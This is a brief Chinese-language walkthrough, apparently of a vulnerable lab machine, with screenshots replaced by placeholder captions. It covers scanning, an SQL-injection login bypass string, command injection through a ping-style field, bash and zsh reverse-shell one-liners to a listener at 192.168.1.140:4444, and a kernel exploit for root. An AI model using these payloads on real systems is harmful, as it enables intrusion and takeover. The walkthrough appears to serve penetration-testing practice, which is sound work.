信息搜集

扫描IP地址

在这里插入图片描述

扫描端口

在这里插入图片描述

80端口

在这里插入图片描述

万能密码登录

用户名：admin’or ‘1’ = ‘1 –+ 密码随便写
在这里插入图片描述
登录成功

命令执行漏洞

输入127.0.0.1 | ls 成功执行命令
在这里插入图片描述

反弹shell

使用bash反弹shell
bash -c 'exec bash -i &>/dev/tcp/192.168.1.140/4444 <&1'
使用zsh反弹shell
zsh -c 'zmodload zsh/net/tcp && ztcp 192.168.1.140 4444 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'

kali 开启监听
在这里插入图片描述
浏览器输入：127.0.0.1 | bash -c ‘exec bash -i &>/dev/tcp/192.168.1.140/4444 <&1’

成功拿到shell
在这里插入图片描述

提权

查看内核版本
在这里插入图片描述
搜索exp

将exp上传到靶机

编译exp，执行exp，成功提权到root